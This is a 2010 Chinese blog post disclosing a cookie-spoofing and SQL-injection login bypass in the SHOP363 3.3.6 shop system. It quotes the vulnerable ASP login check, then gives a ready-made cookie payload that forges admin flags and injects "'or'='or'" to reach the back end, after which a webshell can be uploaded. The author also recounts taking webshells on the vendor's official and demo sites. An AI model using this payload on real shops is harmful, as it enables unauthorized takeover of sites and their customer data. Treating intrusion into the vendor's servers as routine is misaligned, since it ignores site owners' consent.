安全漏洞 订阅所有【安全漏洞】的日志

SHOP363网店系统通杀漏洞

作者:王者星星 日期:2010-07-25

字体大小:
  • 发布日期:2010-07.24 
  • 发布作者:zitengjushi
  • 影响版本:SHOP363 3.3.6
  • 官方地址:www.shop363.net
  • 漏洞描述:SHOP363 程序未进行严格过滤,产生cookies欺骗漏洞。并且可以构造上传恶意代码从而获取网站权限。

    笔者分析:
    在讨论组看有坛友求SHOP363后台拿WEBSHELL方法,因为以前没用过这个系统不熟悉所以就百度了下找到了官方演示,通过一个老漏洞拿(不是网店程序本身的漏洞)到了官方演示的webHSELL,然后在官方网站目录下还有个演示站,还是那个方法直接拿到官方权限。拿到WEBSHELL后看了下网店的后台代码开始找相关的利用漏洞,看了几个文件果然发现了利用的地方。昨天发了个智睿的管理系统的COOKIES欺骗漏洞,今天看SHOP363的Fun.asp文件发现管理验证方法基本试相同的,呵呵,真实巧啊。
    后台目录Admin_Shop363下面的FUN.ASP里面的Sub checklogin() 代码
    1. Sub checklogin() '检测是否登陆后台  
    2. dim AdminName,AdminPassword,AdminFlags  
    3. Session(CacheName &"AdminName") = Request.Cookies(SitWebCookies)("AdminName")   
    4. Session(CacheName &"AdminPassword") = Request.Cookies  
    5.  
    6. (SitWebCookies)("AdminPassword")  
    7. session(CacheName &"AdminFlags")=Request.Cookies(SitWebCookies)  
    8.  
    9. ("AdminFlags")  
    10. session(CacheName &"Truename")=Request.Cookies(SitWebCookies)  
    11.  
    12. ("Truename")  
    13. Session(CacheName &"AdminoldFlags") = Request.Cookies  
    14.  
    15. (SitWebCookies)("AdminoldFlags")  
    16. Session(CacheName &"TFlags") = Request.Cookies(SitWebCookies)  
    17.  
    18. ("TFlags")  
    19.  
    20.  
    21. AdminName=Session(CacheName &"AdminName")  
    22. AdminPassword=Session(CacheName &"AdminPassword")  
    23. AdminFlags=Session(CacheName &"AdminFlags")  
    24.  
    25. IF AdminName="" Or AdminPassword="" Or AdminFlags="" Then  
    26. 'IF AdminName="" Then  
    27. response.redirect("index.asp")   
    28. response.End()   
    29. End If   
    30. End Sub 下面这个是在另一个演示站看到的改进代码  
    31. Sub checklogin() '检测是否登陆后台  
    32. dim AdminName,AdminPassword,AdminFlags  
    33.  
    34. Session(CacheName &"AdminName") = Request.Cookies(SitWebCookies)("AdminName")   
    35. Session(CacheName &"AdminPassword") = Request.Cookies  
    36.  
    37. (SitWebCookies)("AdminPassword")  
    38. session(CacheName &"AdminFlags")=Request.Cookies(SitWebCookies)  
    39.  
    40. ("AdminFlags")  
    41. session(CacheName &"Truename")=Request.Cookies(SitWebCookies)  
    42.  
    43. ("Truename")  
    44. Session(CacheName &"AdminoldFlags") = Request.Cookies  
    45.  
    46. (SitWebCookies)("AdminoldFlags")  
    47. Session(CacheName &"TFlags") = Request.Cookies(SitWebCookies)  
    48.  
    49. ("TFlags")  
    50.  
    51.  
    52. AdminName=Session(CacheName &"AdminName")  
    53. AdminPassword=Session(CacheName &"AdminPassword")  
    54. AdminFlags=Session(CacheName &"AdminFlags")  
    55.  
    56. Strsqlck="select * from Shop363_Admin where name='"& AdminName &"' and   
    57.  
    58. Password='"&AdminPassword&"'"  
    59. set rsck=server.CreateObject("Adodb.Recordset")  
    60. rsck.open Strsqlck,conn,1,1  
    61. If rsck.eof Then  
    62. response.redirect("index.asp")   
    63. response.End()  
    64. End If  
    65. rsck.close  
    66. Set rsck=nothing 
    67.  
    68.  
    69. 'IF AdminName="" Or AdminPassword="" Or AdminFlags="" Then  
    70. 'IF AdminName="" Then  
    71. ' response.redirect("index.asp")   
    72. ' response.End()   
    73. 'End If   
    74. End Sub   

    基本没改进什么,一样还是COOKIES欺骗,下面的是COOKIES利用代码:

     Sy%5FShops=TFlags=1%2C2%2C3%2C4%2C5%2C11%2C12%_2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C21%2C22%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C41%2C42%2C43%_2C44%2C51%2C52%2C53%2C54%2C55%2C56%2C61%2C62%2C63%2C64&AdminoldFlags=1&Truename=%CE%_DE&AdminFlags=1&AdminPassword='or'='or'&AdminName='or'='or';
     



文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
相关日志:
评论: 0 | 引用: 0 | 查看次数: -
发表评论
昵 称:
密 码: 游客发言不需要密码.
内 容:
验证码: 验证码
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.